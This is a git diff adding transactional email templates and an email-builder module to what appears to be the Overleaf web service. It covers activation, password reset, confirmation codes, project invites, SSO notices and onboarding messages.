b/services/web/app/src/Features/Email/Bodies/NoCTAEmailBody.js new file mode 100644 index 0000000..fb68ecc --- /dev/null +++ b/services/web/app/src/Features/Email/Bodies/NoCTAEmailBody.js @@ -0,0 +1,46 @@ +const _ = require('lodash') + +module.exports = _.template(`\ + <table class="row" style="border-collapse: collapse; border-spacing: 0; display: table; padding: 0; position: relative; text-align: left; vertical-align: top; width: 100%;"> + <tbody> + <tr style="padding: 0; vertical-align: top;"> + <th class="small-12 columns" style="line-height: 1.3; margin: 0 auto; padding: 0; padding-bottom: 16px; padding-left: 16px; padding-right: 16px; text-align: left; width: 564px;"> + <table style="border-collapse: collapse; border-spacing: 0; padding: 0; text-align: left; vertical-align: top; width: 100%; color: #5D6879; font-family: Helvetica, Arial, sans-serif; font-size: 16px; font-weight: normal; line-height: 1.3;"> + <tr style="padding: 0; text-align: left; vertical-align: top;"> + <th style="margin: 0; padding: 0; text-align: left;"> + <% if (title) { %> + <h3 class="force-overleaf-style" style="margin: 0; color: #5D6879; font-family: Georgia, serif; font-size: 24px; font-weight: normal; line-height: 1.3; padding: 0; text-align: left; word-wrap: normal;"> + <%= title %> + </h3> + <% } %> + </th> + <tr> + <td> + <p style="height: 20px; margin: 0; padding: 0;"> </p> + + <% if (greeting) { %> + <p style="margin: 0 0 10px 0; padding: 0;"> + <%= greeting %> + </p> + <% } %> + + <% (message).forEach(function(paragraph) { %> + <p class="force-overleaf-style" style="margin: 0 0 10px 0; padding: 0;"> + <%= paragraph %> + </p> + <% }) %> + <% if (highlightedText) { %> + <div style="text-align: center; color: #1B222C; font-size: 20px; margin: 16px 0; padding: 16px 8px; border-radius: 8px; background: #F4F5F6;"> + <b><%= highlightedText %></b> + </div> + <% } %> + </td> 
+ </tr> + </tr> + </table> + </th> + </tr> + </tbody> + </table> +\ +`) diff --git a/services/web/app/src/Features/Email/Bodies/cta-email.js b/services/web/app/src/Features/Email/Bodies/cta-email.js new file mode 100644 index 0000000..346793c --- /dev/null +++ b/services/web/app/src/Features/Email/Bodies/cta-email.js @@ -0,0 +1,96 @@ +const _ = require('lodash') + +module.exports = _.template(`\ + <table class="row" style="border-collapse: collapse; border-spacing: 0; display: table; padding: 0; position: relative; text-align: left; vertical-align: top; width: 100%;"> + <tbody> + <tr style="padding: 0; vertical-align: top;"> + <th class="small-12 columns" style="line-height: 1.3; margin: 0 auto; padding: 0; padding-bottom: 16px; padding-left: 16px; padding-right: 16px; text-align: left;"> + <table class="cta-table" style="border-collapse: collapse; border-spacing: 0; padding: 0; text-align: left; vertical-align: top; width: 100%; color: #5D6879; font-family: Helvetica, Arial, sans-serif; font-size: 16px; font-weight: normal; line-height: 1.3;"> + <tr style="padding: 0; text-align: left; vertical-align: top;"> + <th style="margin: 0; padding: 0; text-align: left;"> + <% if (title) { %> + <h3 class="force-overleaf-style" style="margin: 0; color: #5D6879; font-family: Georgia, serif; font-size: 24px; font-weight: normal; line-height: 1.3; padding: 0; text-align: left; word-wrap: normal;"> + <%= title %> + </h3> + <% } %> + </th> + <tr> + <td> + <p style="height: 20px; margin: 0; padding: 0;"> </p> + + <% if (greeting) { %> + <p style="margin: 0 0 10px 0; padding: 0;"> + <%= greeting %> + </p> + <% } %> + + <% (message).forEach(function(paragraph) { %> + <p class="force-overleaf-style" style="margin: 0 0 10px 0; padding: 0;"> + <%= paragraph %> + </p> + <% }) %> + + <p style="margin: 0; padding: 0;"> </p> + + <table style="border-collapse: collapse; border-spacing: 0; float: none; margin: 0 auto; padding: 0; text-align: center; vertical-align: top; width: auto;"> + <tr style="padding: 0; text-align: left; vertical-align: top;"> + <td style="-moz-hyphens: auto; -webkit-hyphens: auto; border-collapse: collapse !important; border-radius: 9999px; color: #5D6879; font-family: Helvetica, Arial, sans-serif; font-size: 16px; font-weight: normal; hyphens: auto; line-height: 1.3; margin: 0; padding: 0; text-align: left; vertical-align: top; word-wrap: break-word;"> + <table style="border-collapse: collapse; border-spacing: 0; padding: 0; text-align: left; vertical-align: top; width: 100%;"> + <tr style="padding: 0; text-align: left; vertical-align: top;"> + <td style="-moz-hyphens: auto; -webkit-hyphens: auto; background: #4F9C45; border: none; border-collapse: collapse !important; border-radius: 9999px; color: #fefefe; font-family: Helvetica, Arial, sans-serif; font-size: 16px; font-weight: normal; hyphens: auto; line-height: 1.3; margin: 0; padding: 0; text-align: left; vertical-align: top; word-wrap: break-word;"> + <a href="<%= ctaURL %>" style="border: 0 solid #4F9C45; border-radius: 9999px; color: #fefefe; display: inline-block; font-family: Helvetica, Arial, sans-serif; font-size: 16px; font-weight: bold; line-height: 1.3; margin: 0; padding: 8px 16px 8px 16px; text-align: left; text-decoration: none;"> + <%= ctaText %> + </a> + </td> + </tr> + </table> + </td> + </tr> + </table> + + <% if (secondaryMessage && secondaryMessage.length > 0) { %> + <p style="margin: 0; padding: 0;"> </p> + + <% (secondaryMessage).forEach(function(paragraph) { %> + <p class="force-overleaf-style"> + <%= paragraph %> 
+ </p> + <% }) %> + <% } %> + + <p style="margin: 0; padding: 0;"> </p> + + <p class="force-overleaf-style" style="font-size: 12px;"> + If the button above does not appear, please copy and paste this link into your browser's address bar: + </p> + + <p class="force-overleaf-style" style="font-size: 12px;"> + <%= ctaURL %> + </p> + </td> + </tr> + </tr> + </table> + </th> + </tr> + </tbody> + </table> + <% if (gmailGoToAction) { %> + <script type="application/ld+json"> + <%= + StringHelper.stringifyJsonForScript({ + "@context": "http://schema.org", + "@type": "EmailMessage", + "potentialAction": { + "@type": "ViewAction", + "target": gmailGoToAction.target, + "url": gmailGoToAction.target, + "name": gmailGoToAction.name + }, + "description": gmailGoToAction.description + }) + %> + </script> + <% } %> +\ +`) diff --git a/services/web/app/src/Features/Email/EmailBuilder.js b/services/web/app/src/Features/Email/EmailBuilder.js new file mode 100644 index 0000000..0e46b1b --- /dev/null +++ b/services/web/app/src/Features/Email/EmailBuilder.js @@ -0,0 +1,971 @@ +const _ = require('lodash') +const settings = require('@overleaf/settings') +const moment = require('moment') +const EmailMessageHelper = require('./EmailMessageHelper') +const StringHelper = require('../Helpers/StringHelper') +const BaseWithHeaderEmailLayout = require('./Layouts/BaseWithHeaderEmailLayout') +const SpamSafe = require('./SpamSafe') +const ctaEmailBody = require('./Bodies/cta-email') +const NoCTAEmailBody = require('./Bodies/NoCTAEmailBody') + +function _emailBodyPlainText(content, opts, ctaEmail) { + let emailBody = `${content.greeting(opts, true)}` + emailBody += `\r\n\r\n` + emailBody += `${content.message(opts, true).join('\r\n\r\n')}` + + if (ctaEmail) { + emailBody += `\r\n\r\n` + emailBody += `${content.ctaText(opts, true)}: ${content.ctaURL(opts, true)}` + } + + if ( + content.secondaryMessage(opts, true) && + content.secondaryMessage(opts, true).length > 0 + ) { + emailBody += `\r\n\r\n` + emailBody += `${content.secondaryMessage(opts, true).join('\r\n\r\n')}` + } + + emailBody += `\r\n\r\n` + emailBody += `Regards,\r\nThe ${settings.appName} Team - ${settings.siteUrl}` + + if ( + settings.email && + settings.email.template && + settings.email.template.customFooter + ) { + emailBody += `\r\n\r\n` + emailBody += settings.email.template.customFooter + } + + return emailBody +} + +function ctaTemplate(content) { + if ( + !content.ctaURL || + !content.ctaText || + !content.message || + !content.subject + ) { + throw new Error('missing required CTA email content') + } + if (!content.title) { + content.title = () => {} + } + if (!content.greeting) { + content.greeting = () => 'Hi,' + } + if (!content.secondaryMessage) { + content.secondaryMessage = () => [] + } + if (!content.gmailGoToAction) { + content.gmailGoToAction = () => {} + } + return { + subject(opts) { + return content.subject(opts) + }, + layout: BaseWithHeaderEmailLayout, + plainTextTemplate(opts) { + return _emailBodyPlainText(content, opts, true) + }, + compiledTemplate(opts) { + return ctaEmailBody({ + title: content.title(opts), + greeting: content.greeting(opts), + message: content.message(opts), + secondaryMessage: content.secondaryMessage(opts), + ctaText: content.ctaText(opts), + ctaURL: content.ctaURL(opts), + gmailGoToAction: content.gmailGoToAction(opts), + StringHelper, + }) + }, + } +} + +function NoCTAEmailTemplate(content) { + if (content.greeting == null) { + content.greeting = () => 'Hi,' + } + if (!content.message) { + throw new 
Error('missing message') + } + return { + subject(opts) { + return content.subject(opts) + }, + layout: BaseWithHeaderEmailLayout, + plainTextTemplate(opts) { + return `\ +${content.greeting(opts)} + +${content.message(opts, true).join('\r\n\r\n')} + +Regards, +The ${settings.appName} Team - ${settings.siteUrl}\ + ` + }, + compiledTemplate(opts) { + return NoCTAEmailBody({ + title: + typeof content.title === 'function' ? content.title(opts) : undefined, + greeting: content.greeting(opts), + highlightedText: + typeof content.highlightedText === 'function' + ? content.highlightedText(opts) + : undefined, + message: content.message(opts), + StringHelper, + }) + }, + } +} + +function buildEmail(templateName, opts) { + const template = templates[templateName] + opts.siteUrl = settings.siteUrl + opts.body = template.compiledTemplate(opts) + return { + subject: template.subject(opts), + html: template.layout(opts), + text: template.plainTextTemplate && template.plainTextTemplate(opts), + } +} + +const templates = {} + +templates.registered = ctaTemplate({ + subject() { + return `Activate your ${settings.appName} Account` + }, + message(opts) { + return [ + `Congratulations, you've just had an account created for you on ${ + settings.appName + } with the email address '${_.escape(opts.to)}'.`, + 'Click here to set your password and log in:', + ] + }, + secondaryMessage() { + return [ + `If you have any questions or problems, please contact ${settings.adminEmail}`, + ] + }, + ctaText() { + return 'Set password' + }, + ctaURL(opts) { + return opts.setNewPasswordUrl + }, +}) + +templates.canceledSubscription = ctaTemplate({ + subject() { + return `${settings.appName} thoughts` + }, + message() { + return [ + `We are sorry to see you cancelled your ${settings.appName} premium subscription. 
Would you mind giving us some feedback on what the site is lacking at the moment via this quick survey?`, + ] + }, + secondaryMessage() { + return ['Thank you in advance!'] + }, + ctaText() { + return 'Leave Feedback' + }, + ctaURL(opts) { + return 'https://docs.google.com/forms/d/e/1FAIpQLSfa7z_s-cucRRXm70N4jEcSbFsZeb0yuKThHGQL8ySEaQzF0Q/viewform?usp=sf_link' + }, +}) + +templates.reactivatedSubscription = ctaTemplate({ + subject() { + return `Subscription Reactivated - ${settings.appName}` + }, + message(opts) { + return ['Your subscription was reactivated successfully.'] + }, + ctaText() { + return 'View Subscription Dashboard' + }, + ctaURL(opts) { + return `${settings.siteUrl}/user/subscription` + }, +}) + +templates.passwordResetRequested = ctaTemplate({ + subject() { + return `Password Reset - ${settings.appName}` + }, + title() { + return 'Password Reset' + }, + message() { + return [`We got a request to reset your ${settings.appName} password.`] + }, + secondaryMessage() { + return [ + "If you ignore this message, your password won't be changed.", + "If you didn't request a password reset, let us know.", + ] + }, + ctaText() { + return 'Reset password' + }, + ctaURL(opts) { + return opts.setNewPasswordUrl + }, +}) + +templates.confirmEmail = ctaTemplate({ + subject() { + return `Confirm Email - ${settings.appName}` + }, + title() { + return 'Confirm Email' + }, + message(opts) { + return [ + `Please confirm that you have added a new email, ${opts.to}, to your ${settings.appName} account.`, + ] + }, + secondaryMessage() { + return [ + `If you did not request this, please let us know at <a href="mailto:${settings.adminEmail}">${settings.adminEmail}</a>.`, + `If you have any questions or trouble confirming your email address, please get in touch with our support team at ${settings.adminEmail}.`, + ] + }, + ctaText() { + return 'Confirm Email' + }, + ctaURL(opts) { + return opts.confirmEmailUrl + }, +}) + +templates.confirmCode = NoCTAEmailTemplate({ + greeting(opts) { + return '' + }, + subject(opts) { + return `Confirm your email address on Overleaf (${opts.confirmCode})` + }, + title(opts) { + return 'Confirm your email address' + }, + message(opts, isPlainText) { + const msg = opts.welcomeUser + ? [ + `Welcome to Overleaf! 
We're so glad you joined us.`, + 'Use this 6-digit confirmation code to finish your setup.', + ] + : ['Use this 6-digit code to confirm your email address.'] + + if (isPlainText && opts.confirmCode) { + msg.push(opts.confirmCode) + } + return msg + }, + highlightedText(opts) { + return opts.confirmCode + }, +}) + +templates.projectInvite = ctaTemplate({ + subject(opts) { + const safeName = SpamSafe.isSafeProjectName(opts.project.name) + const safeEmail = SpamSafe.isSafeEmail(opts.owner.email) + + if (safeName && safeEmail) { + return `"${_.escape(opts.project.name)}" — shared by ${_.escape( + opts.owner.email + )}` + } + if (safeName) { + return `${settings.appName} project shared with you — "${_.escape( + opts.project.name + )}"` + } + if (safeEmail) { + return `${_.escape(opts.owner.email)} shared an ${ + settings.appName + } project with you` + } + + return `An ${settings.appName} project has been shared with you` + }, + title(opts) { + return 'Project Invite' + }, + greeting(opts) { + return '' + }, + message(opts, isPlainText) { + // build message depending on spam-safe variables + const message = [`You have been invited to an ${settings.appName} project.`] + + if (SpamSafe.isSafeProjectName(opts.project.name)) { + message.push('<br/> Project:') + message.push(`<b>${_.escape(opts.project.name)}</b>`) + } + + if (SpamSafe.isSafeEmail(opts.owner.email)) { + message.push(`<br/> Shared by:`) + message.push(`<b>${_.escape(opts.owner.email)}</b>`) + } + + if (message.length === 1) { + message.push('<br/> Please view the project to find out more.') + } + + return message.map(m => { + return EmailMessageHelper.cleanHTML(m, isPlainText) + }) + }, + ctaText() { + return 'View project' + }, + ctaURL(opts) { + return opts.inviteUrl + }, + gmailGoToAction(opts) { + return { + target: opts.inviteUrl, + name: 'View project', + description: `Join ${_.escape( + SpamSafe.safeProjectName(opts.project.name, 'project') + )} at ${settings.appName}`, + } + }, +}) + +templates.reconfirmEmail = ctaTemplate({ + subject() { + return `Reconfirm Email - ${settings.appName}` + }, + title() { + return 'Reconfirm Email' + }, + message(opts) { + return [ + `Please reconfirm your email address, ${opts.to}, on your ${settings.appName} account.`, + ] + }, + secondaryMessage() { + return [ + 'If you did not request this, you can simply ignore this message.', + `If you have any questions or trouble confirming your email address, please get in touch with our support team at ${settings.adminEmail}.`, + ] + }, + ctaText() { + return 'Reconfirm Email' + }, + ctaURL(opts) { + return opts.confirmEmailUrl + }, +}) + +templates.verifyEmailToJoinTeam = ctaTemplate({ + subject(opts) { + return `${opts.reminder ? 'Reminder: ' : ''}${_.escape( + _formatUserNameAndEmail(opts.inviter, 'A collaborator') + )} has invited you to join a group subscription on ${settings.appName}` + }, + title(opts) { + return `${opts.reminder ? 'Reminder: ' : ''}${_.escape( + _formatUserNameAndEmail(opts.inviter, 'A collaborator') + )} has invited you to join a group subscription on ${settings.appName}` + }, + message(opts) { + return [ + `Please click the button below to join the group subscription and enjoy the benefits of an upgraded ${settings.appName} account.`, + ] + }, + ctaText(opts) { + return 'Join now' + }, + ctaURL(opts) { + return opts.acceptInviteUrl + }, +}) + +templates.verifyEmailToJoinManagedUsers = ctaTemplate({ + subject(opts) { + return `${ + opts.reminder ? 
'Reminder: ' : '' + }You’ve been invited by ${_.escape( + _formatUserNameAndEmail(opts.inviter, 'a collaborator') + )} to join an ${settings.appName} group subscription.` + }, + title(opts) { + return `${ + opts.reminder ? 'Reminder: ' : '' + }You’ve been invited by ${_.escape( + _formatUserNameAndEmail(opts.inviter, 'a collaborator') + )} to join an ${settings.appName} group subscription.` + }, + message(opts) { + return [ + `By joining this group, you'll have access to ${settings.appName} premium features such as additional collaborators, greater maximum compile time, and real-time track changes.`, + ] + }, + secondaryMessage(opts, isPlainText) { + const changeProjectOwnerLink = EmailMessageHelper.displayLink( + 'change project owner', + `${settings.siteUrl}/learn/how-to/How_to_Transfer_Project_Ownership`, + isPlainText + ) + + return [ + `<b>User accounts in this group are managed by ${_.escape( + _formatUserNameAndEmail(opts.admin, 'an admin') + )}</b>`, + `If you accept, you’ll transfer the management of your ${settings.appName} account to the owner of the group subscription, who will then have admin rights over your account and control over your stuff.`, + `If you have personal projects in your ${settings.appName} account that you want to keep separate, that’s not a problem. You can set up another account under a personal email address and change the ownership of your personal projects to the new account. Find out how to ${changeProjectOwnerLink}.`, + ] + }, + ctaURL(opts) { + return opts.acceptInviteUrl + }, + ctaText(opts) { + return 'Accept invitation' + }, + greeting() { + return '' + }, +}) + +templates.inviteNewUserToJoinManagedUsers = ctaTemplate({ + subject(opts) { + return `${ + opts.reminder ? 'Reminder: ' : '' + }You’ve been invited by ${_.escape( + _formatUserNameAndEmail(opts.inviter, 'a collaborator') + )} to join an ${settings.appName} group subscription.` + }, + title(opts) { + return `${ + opts.reminder ? 'Reminder: ' : '' + }You’ve been invited by ${_.escape( + _formatUserNameAndEmail(opts.inviter, 'a collaborator') + )} to join an ${settings.appName} group subscription.` + }, + message(opts) { + return [''] + }, + secondaryMessage(opts) { + return [ + `<b>User accounts in this group are managed by ${_.escape( + _formatUserNameAndEmail(opts.admin, 'an admin') + )}.</b>`, + `If you accept, the owner of the group subscription will have admin rights over your account and control over your stuff.`, + `<b>What is ${settings.appName}?</b>`, + `${settings.appName} is the collaborative online LaTeX editor loved by researchers and technical writers. With thousands of ready-to-use templates and an array of LaTeX learning resources you’ll be up and running in no time.`, + ] + }, + ctaURL(opts) { + return opts.acceptInviteUrl + }, + ctaText(opts) { + return 'Accept invitation' + }, + greeting() { + return '' + }, +}) + +templates.groupSSOLinkingInvite = ctaTemplate({ + subject(opts) { + const subjectPrefix = opts.reminder ? 'Reminder: ' : 'Action required: ' + return `${subjectPrefix}Authenticate your Overleaf account` + }, + title(opts) { + const titlePrefix = opts.reminder ? 'Reminder: ' : '' + return `${titlePrefix}Single sign-on enabled` + }, + message(opts) { + return [ + `Hi, + <div> + Your group administrator has enabled single sign-on for your group. + </div> + </br> + <div> + <strong>What does this mean for you?</strong> + </div> + </br> + <div> + You won't need to remember a separate email address and password to sign in to Overleaf. 
+ All you need to do is authenticate your existing Overleaf account with your SSO provider. + </div> + `, + ] + }, + secondaryMessage(opts) { + return [``] + }, + ctaURL(opts) { + return opts.authenticateWithSSO + }, + ctaText(opts) { + return 'Authenticate with SSO' + }, + greeting() { + return '' + }, +}) + +templates.groupSSOReauthenticate = ctaTemplate({ + subject(opts) { + return 'Action required: Reauthenticate your Overleaf account' + }, + title(opts) { + return 'Action required: Reauthenticate SSO' + }, + message(opts) { + return [ + `Hi, + <div> + Single sign-on for your Overleaf group has been updated. + This means you need to reauthenticate your Overleaf account with your group’s SSO provider. + </div> + `, + ] + }, + secondaryMessage(opts) { + if (!opts.isManagedUser) { + return [''] + } else { + const passwordResetUrl = `${settings.siteUrl}/user/password/reset` + return [ + `If you’re not currently logged in to Overleaf, you'll need to <a href="${passwordResetUrl}">set a new password</a> to reauthenticate.`, + ] + } + }, + ctaURL(opts) { + return opts.authenticateWithSSO + }, + ctaText(opts) { + return 'Reauthenticate now' + }, + greeting() { + return '' + }, +}) + +templates.groupSSODisabled = ctaTemplate({ + subject(opts) { + if (opts.userIsManaged) { + return `Action required: Set your Overleaf password` + } else { + return 'A change to your Overleaf login options' + } + }, + title(opts) { + return `Single sign-on disabled` + }, + message(opts, isPlainText) { + const loginUrl = `${settings.siteUrl}/login` + let whatDoesThisMeanExplanation = [ + `You can still log in to Overleaf using one of our other <a href="${loginUrl}" style="color: #0F7A06; text-decoration: none;">login options</a> or with your email address and password.`, + `If you don't have a password, you can set one now.`, + ] + if (opts.userIsManaged) { + whatDoesThisMeanExplanation = [ + 'You now need an email address and password to sign in to your Overleaf account.', + ] + } + + const message = [ + 'Your group administrator has disabled single sign-on for your group.', + '<br/>', + '<b>What does this mean for you?</b>', + ...whatDoesThisMeanExplanation, + ] + + return message.map(m => { + return EmailMessageHelper.cleanHTML(m, isPlainText) + }) + }, + secondaryMessage(opts) { + return [``] + }, + ctaURL(opts) { + return opts.setNewPasswordUrl + }, + ctaText(opts) { + return 'Set your new password' + }, +}) + +templates.surrenderAccountForManagedUsers = ctaTemplate({ + subject(opts) { + const admin = _.escape(_formatUserNameAndEmail(opts.admin, 'an admin')) + + const toGroupName = opts.groupName ? ` to ${opts.groupName}` : '' + + return `${ + opts.reminder ? 'Reminder: ' : '' + }You’ve been invited by ${admin} to transfer management of your ${ + settings.appName + } account${toGroupName}` + }, + title(opts) { + const admin = _.escape(_formatUserNameAndEmail(opts.admin, 'an admin')) + + const toGroupName = opts.groupName ? ` to ${opts.groupName}` : '' + + return `${ + opts.reminder ? 'Reminder: ' : '' + }You’ve been invited by ${admin} to transfer management of your ${ + settings.appName + } account${toGroupName}` + }, + message(opts, isPlainText) { + const admin = _.escape(_formatUserNameAndEmail(opts.admin, 'an admin')) + + const managedUsersLink = EmailMessageHelper.displayLink( + 'user account management', + `${settings.siteUrl}/learn/how-to/Understanding_Managed_Overleaf_Accounts`, + isPlainText + ) + + return [ + `Your ${settings.appName} account ${_.escape( + opts.to + )} is part of ${admin}'s group. 
They’ve now enabled ${managedUsersLink} for the group. This will ensure that projects aren’t lost when someone leaves the group.`, + ] + }, + secondaryMessage(opts, isPlainText) { + const transferProjectOwnershipLink = EmailMessageHelper.displayLink( + 'change project owner', + `${settings.siteUrl}/learn/how-to/How_to_Transfer_Project_Ownership`, + isPlainText + ) + + return [ + `<b>What does this mean for you?</b>`, + `If you accept, you’ll transfer the management of your ${settings.appName} account to the owner of the group subscription, who will then have admin rights over your account and control over your stuff.`, + `If you have personal projects in your ${settings.appName} account that you want to keep separate, that’s not a problem. You can set up another account under a personal email address and change the ownership of your personal projects to the new account. Find out how to ${transferProjectOwnershipLink}.`, + `If you think this invitation has been sent in error please contact your group administrator.`, + ] + }, + ctaURL(opts) { + return opts.acceptInviteUrl + }, + ctaText(opts) { + return 'Accept invitation' + }, + greeting() { + return '' + }, +}) + +templates.testEmail = ctaTemplate({ + subject() { + return `A Test Email from ${settings.appName}` + }, + title() { + return `A Test Email from ${settings.appName}` + }, + greeting() { + return 'Hi,' + }, + message() { + return [`This is a test Email from ${settings.appName}`] + }, + ctaText() { + return `Open ${settings.appName}` + }, + ctaURL() { + return settings.siteUrl + }, +}) + +templates.ownershipTransferConfirmationPreviousOwner = NoCTAEmailTemplate({ + subject(opts) { + return `Project ownership transfer - ${settings.appName}` + }, + title(opts) { + const projectName = _.escape( + SpamSafe.safeProjectName(opts.project.name, 'Your project') + ) + return `${projectName} - Owner change` + }, + message(opts, isPlainText) { + const nameAndEmail = _.escape( + _formatUserNameAndEmail(opts.newOwner, 'a collaborator') + ) + const projectName = _.escape( + SpamSafe.safeProjectName(opts.project.name, 'your project') + ) + const projectNameDisplay = isPlainText + ? projectName + : `<b>${projectName}</b>` + return [ + `As per your request, we have made ${nameAndEmail} the owner of ${projectNameDisplay}.`, + `If you haven't asked to change the owner of ${projectNameDisplay}, please get in touch with us via ${settings.adminEmail}.`, + ] + }, +}) + +templates.ownershipTransferConfirmationNewOwner = ctaTemplate({ + subject(opts) { + return `Project ownership transfer - ${settings.appName}` + }, + title(opts) { + const projectName = _.escape( + SpamSafe.safeProjectName(opts.project.name, 'Your project') + ) + return `${projectName} - Owner change` + }, + message(opts, isPlainText) { + const nameAndEmail = _.escape( + _formatUserNameAndEmail(opts.previousOwner, 'A collaborator') + ) + const projectName = _.escape( + SpamSafe.safeProjectName(opts.project.name, 'a project') + ) + const projectNameEmphasized = isPlainText + ? projectName + : `<b>${projectName}</b>` + return [ + `${nameAndEmail} has made you the owner of ${projectNameEmphasized}. 
You can now manage ${projectName} sharing settings.`, + ] + }, + ctaText(opts) { + return 'View project' + }, + ctaURL(opts) { + const projectUrl = `${ + settings.siteUrl + }/project/${opts.project._id.toString()}` + return projectUrl + }, +}) + +templates.userOnboardingEmail = NoCTAEmailTemplate({ + subject(opts) { + return `Getting more out of ${settings.appName}` + }, + greeting(opts) { + return '' + }, + title(opts) { + return `Getting more out of ${settings.appName}` + }, + message(opts, isPlainText) { + const learnLatexLink = EmailMessageHelper.displayLink( + 'Learn LaTeX in 30 minutes', + `${settings.siteUrl}/learn/latex/Learn_LaTeX_in_30_minutes?utm_source=overleaf&utm_medium=email&utm_campaign=onboarding`, + isPlainText + ) + const templatesLinks = EmailMessageHelper.displayLink( + 'Find a beautiful template', + `${settings.siteUrl}/latex/templates?utm_source=overleaf&utm_medium=email&utm_campaign=onboarding`, + isPlainText + ) + const collaboratorsLink = EmailMessageHelper.displayLink( + 'Work with your collaborators', + `${settings.siteUrl}/learn/how-to/Sharing_a_project?utm_source=overleaf&utm_medium=email&utm_campaign=onboarding`, + isPlainText + ) + const siteLink = EmailMessageHelper.displayLink( + 'www.overleaf.com', + settings.siteUrl, + isPlainText + ) + const userSettingsLink = EmailMessageHelper.displayLink( + 'here', + `${settings.siteUrl}/user/email-preferences`, + isPlainText + ) + const onboardingSurveyLink = EmailMessageHelper.displayLink( + 'Join our user feedback program', + 'https://forms.gle/DB7pdk2B1VFQqVVB9', + isPlainText + ) + return [ + `Thanks for signing up for ${settings.appName} recently. We hope you've been finding it useful! Here are some key features to help you get the most out of the service:`, + `${learnLatexLink}: In this tutorial we provide a quick and easy first introduction to LaTeX with no prior knowledge required. By the time you are finished, you will have written your first LaTeX document!`, + `${templatesLinks}: If you're looking for a template or example to get started, we've a large selection available in our template gallery, including CVs, project reports, journal articles and more.`, + `${collaboratorsLink}: One of the key features of Overleaf is the ability to share projects and collaborate on them with other users. Find out how to share your projects with your colleagues in this quick how-to guide.`, + `${onboardingSurveyLink} to help us make Overleaf even better!`, + 'Thanks again for using Overleaf :)', + `Lee`, + `Lee Shalit<br />CEO<br />${siteLink}<hr>`, + `You're receiving this email because you've recently signed up for an Overleaf account. 
If you've previously subscribed to emails about product offers and company news and events, you can unsubscribe ${userSettingsLink}.`, + ] + }, +}) + +templates.securityAlert = NoCTAEmailTemplate({ + subject(opts) { + return `Overleaf security note: ${opts.action}` + }, + title(opts) { + return opts.action.charAt(0).toUpperCase() + opts.action.slice(1) + }, + message(opts, isPlainText) { + const dateFormatted = moment().format('dddd D MMMM YYYY') + const timeFormatted = moment().format('HH:mm') + const helpLink = EmailMessageHelper.displayLink( + 'quick guide', + `${settings.siteUrl}/learn/how-to/Keeping_your_account_secure`, + isPlainText + ) + + const actionDescribed = EmailMessageHelper.cleanHTML( + opts.actionDescribed, + isPlainText + ) + + if (!opts.message) { + opts.message = [] + } + const message = opts.message.map(m => { + return EmailMessageHelper.cleanHTML(m, isPlainText) + }) + + return [ + `We are writing to let you know that ${actionDescribed} on ${dateFormatted} at ${timeFormatted} GMT.`, + ...message, + `If this was you, you can ignore this email.`, + `If this was not you, we recommend getting in touch with our support team at ${settings.adminEmail} to report this as potentially suspicious activity on your account.`, + `We also encourage you to read our ${helpLink} to keeping your ${settings.appName} account safe.`, + ] + }, +}) + +templates.SAMLDataCleared = ctaTemplate({ + subject(opts) { + return `Institutional Login No Longer Linked - ${settings.appName}` + }, + title(opts) { + return 'Institutional Login No Longer Linked' + }, + message(opts, isPlainText) { + return [ + `We're writing to let you know that due to a bug on our end, we've had to temporarily disable logging into your ${settings.appName} through your institution.`, + `To get it going again, you'll need to relink your institutional email address to your ${settings.appName} account via your settings.`, + ] + }, + secondaryMessage() { + return [ + `If you ordinarily log in to your ${settings.appName} account through your institution, you may need to set or reset your password to regain access to your account first.`, + 'This bug did not affect the security of any accounts, but it may have affected license entitlements for a small number of users. We are sorry for any inconvenience that this may cause for you.', + `If you have any questions, please get in touch with our support team at ${settings.adminEmail} or by replying to this email.`, + ] + }, + ctaText(opts) { + return 'Update my Emails and Affiliations' + }, + ctaURL(opts) { + return `${settings.siteUrl}/user/settings` + }, +}) + +templates.welcome = ctaTemplate({ + subject() { + return `Welcome to ${settings.appName}` + }, + title() { + return `Welcome to ${settings.appName}` + }, + greeting() { + return 'Hi,' + }, + message(opts, isPlainText) { + const logInAgainDisplay = EmailMessageHelper.displayLink( + 'log in again', + `${settings.siteUrl}/login`, + isPlainText + ) + const helpGuidesDisplay = EmailMessageHelper.displayLink( + 'Help Guides', + `${settings.siteUrl}/learn`, + isPlainText + ) + const templatesDisplay = EmailMessageHelper.displayLink( + 'Templates', + `${settings.siteUrl}/templates`, + isPlainText + ) + + return [ + `Thanks for signing up to ${settings.appName}! 
If you ever get lost, you can ${logInAgainDisplay} with the email address '${opts.to}'.`, + `If you're new to LaTeX, take a look at our ${helpGuidesDisplay} and ${templatesDisplay}.`, + `Please also take a moment to confirm your email address for ${settings.appName}:`, + ] + }, + secondaryMessage() { + return [ + `PS. We love talking to our users about ${settings.appName}. Reply to this email to get in touch with us directly, whatever the reason. Questions, comments, problems, suggestions, all welcome!`, + ] + }, + ctaText() { + return 'Confirm Email' + }, + ctaURL(opts) { + return opts.confirmEmailUrl + }, +}) + +templates.welcomeWithoutCTA = NoCTAEmailTemplate({ + subject() { + return `Welcome to ${settings.appName}` + }, + title() { + return `Welcome to ${settings.appName}` + }, + greeting() { + return 'Hi,' + }, + message(opts, isPlainText) { + const logInAgainDisplay = EmailMessageHelper.displayLink( + 'log in again', + `${settings.siteUrl}/login`, + isPlainText + ) + const helpGuidesDisplay = EmailMessageHelper.displayLink( + 'Help Guides', + `${settings.siteUrl}/learn`, + isPlainText + ) + const templatesDisplay = EmailMessageHelper.displayLink( + 'Templates', + `${settings.siteUrl}/templates`, + isPlainText + ) + + return [ + `Thanks for signing up to ${settings.appName}! If you ever get lost, you can ${logInAgainDisplay} with the email address '${opts.to}'.`, + `If you're new to LaTeX, take a look at our ${helpGuidesDisplay} and ${templatesDisplay}.`, + `PS. We love talking to our users about ${settings.appName}. Reply to this email to get in touch with us directly, whatever the reason. Questions, comments, problems, suggestions, all welcome!`, + ] + }, +}) + +function _formatUserNameAndEmail(user, placeholder) { + if (user.first_name && user.last_name) { + const fullName = `${user.first_name} ${user.last_name}` + if (SpamSafe.isSafeUserName(fullName)) { + if (SpamSafe.isSafeEmail(user.email)) { + return `${fullName} (${user.email})` + } else { + return fullName + } + } + } + return SpamSafe.safeEmail(user.email, placeholder) +} + +module.exports = { + templates, + ctaTemplate, + NoCTAEmailTemplate, + buildEmail, +} diff --git a/services/web/app/src/Features/Email/EmailHandler.js b/services/web/app/src/Features/Email/EmailHandler.js new file mode 100644 index 0000000..f38ce2c --- /dev/null +++ b/services/web/app/src/Features/Email/EmailHandler.js @@ -0,0 +1,41 @@ +const { callbackify } = require('util') +const Settings = 